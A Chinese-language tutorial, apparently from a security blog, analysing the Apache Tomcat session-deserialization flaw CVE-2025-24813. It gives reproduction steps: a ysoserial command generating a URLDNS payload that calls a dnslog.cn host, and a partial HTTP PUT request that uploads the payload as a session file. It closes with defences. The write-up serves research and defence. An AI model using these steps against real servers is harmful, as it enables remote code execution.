Tomcat 反序列化漏洞分析(CVE-2025-24813) 教学文档<\/h1>

漏洞概述<\/h2>
CVE-2025-24813 是 Apache Tomcat 中存在的一个反序列化漏洞，攻击者可以通过构造特殊的 HTTP PUT 请求将恶意序列化数据写入服务器会话文件，当服务器读取这些文件时触发反序列化操作，可能导致远程代码执行(RCE)。<\/p>

漏洞环境配置<\/h2>

启用 PUT 请求支持<\/strong>：

默认情况下 Tomcat 的 PUT 请求功能是关闭的<\/li>
需要修改 conf\/web.xml<\/code> 文件中的 readonly<\/code> 参数值为 false<\/code><\/li> <\/ul> <\/li> <\/ol> <servlet><\/span> <\/span><\/span> <servlet-name><\/span>default<\/servlet-name><\/span> <\/span><\/span> <servlet-class><\/span>org.apache.catalina.servlets.DefaultServlet<\/servlet-class><\/span> <\/span><\/span> <init-param><\/span> <\/span><\/span> <param-name><\/span>debug<\/param-name><\/span> <\/span><\/span> <param-value><\/span>0<\/param-value><\/span> <\/span><\/span> <\/init-param><\/span> <\/span><\/span> <init-param><\/span> <\/span><\/span> <param-name><\/span>readonly<\/param-name><\/span> <\/span><\/span> <param-value><\/span>false<\/param-value><\/span> <\/span><\/span> <\/init-param><\/span> <\/span><\/span> <load-on-startup><\/span>1<\/load-on-startup><\/span> <\/span><\/span><\/servlet><\/span> <\/span><\/span><\/code><\/pre>漏洞分析<\/h2> 序列化文件写入过程<\/h3> PUT 请求处理<\/strong>：<\/p> Tomcat 处理 PUT 请求时会调用 executePartialPut<\/code> 方法创建文件<\/li> 文件路径由请求的 URL 决定 (getRelativePath(req)<\/code>)<\/li> <\/ul> <\/li> 关键代码<\/strong>：<\/p> <\/li> <\/ol> \/\/ 设置文件路径，文件路径就是url <\/span><\/span><\/span><\/span>String path =<\/span> getRelativePath(<\/span>req);<\/span> <\/span><\/span>InputStream resourceInputStream =<\/span> null<\/span>;<\/span> <\/span><\/span>\/\/ 创建文件 <\/span><\/span><\/span><\/span>File contentFile =<\/span> executePartialPut(<\/span>req,<\/span> range,<\/span> path);<\/span> <\/span><\/span>resourceInputStream =<\/span> new<\/span> FileInputStream(<\/span>contentFile)<\/span> <\/span><\/span><\/code><\/pre> 文件存储位置<\/strong>：默认存储在 work\/Catalina\/localhost\/ROOT<\/code> 目录下<\/li> 文件扩展名为 .session<\/code><\/li> <\/ul> <\/li> <\/ol> 反序列化触发点<\/h3> 反序列化入口<\/strong>：<\/p> 漏洞触发点在 session.readObjectData(ois)<\/code><\/li> ois<\/code> 是通过 FileInputStream<\/code> 读取的恶意文件<\/li> <\/ul> <\/li> 会话ID控制<\/strong>：<\/p> 文件路径由 id + FILE_EXT(.session)<\/code> 组成<\/li> id<\/code> 来源于 Request<\/code> 类的 requestedSessionId<\/code> 属性<\/li> 通过 parseSessionCookiesId<\/code> 方法设置会话ID<\/li> <\/ul> <\/li> <\/ol> 漏洞利用步骤<\/h2> 1. 生成恶意序列化数据<\/h3> 使用 ysoserial 工具生成 payload：<\/p> java -jar ysoserial-0.0.6-SNAPSHOT-all.jar URLDNS http:\/\/op9gyt.dnslog.cn > 2.bin <\/span><\/span><\/code><\/pre>2. 构造HTTP请求上传恶意文件<\/h3> PUT<\/span> \/jc\/session HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> 127.0.0.1:8080<\/span> <\/span><\/span>Content-Length:<\/span> 5000<\/span> <\/span><\/span>Content-Range:<\/span> bytes 0-5000\/5200<\/span> <\/span><\/span> <\/span><\/span>{{file(C:\Users\jc\Downloads\2.bin)}} <\/span><\/span><\/code><\/pre>3. 触发反序列化<\/h3> 当服务器读取该会话文件时，会自动触发反序列化操作，执行payload中的恶意代码。<\/p> 防御措施<\/h2> 保持 readonly<\/code> 参数为 true<\/code><\/strong>（默认值）<\/li> 禁用不必要的 HTTP 方法<\/strong>（如 PUT、DELETE 等）<\/li> 升级到修复版本<\/strong>（当官方发布补丁后）<\/li> 实施输入验证<\/strong>，特别是对会话ID的处理<\/li> 使用安全管理器<\/strong>限制反序列化操作<\/li> <\/ol> 参考<\/h2> 本文参考了 jweny 师傅分享的《全网首发！CVE-2025-24813 Tomcat 最新 RCE 分析复现》<\/li> ysoserial 工具：https:\/\/github.com\/frohoff\/ysoserial<\/li> <\/ul> 注：本教学文档仅供安全研究和防御使用，请勿用于非法用途。<\/em><\/p>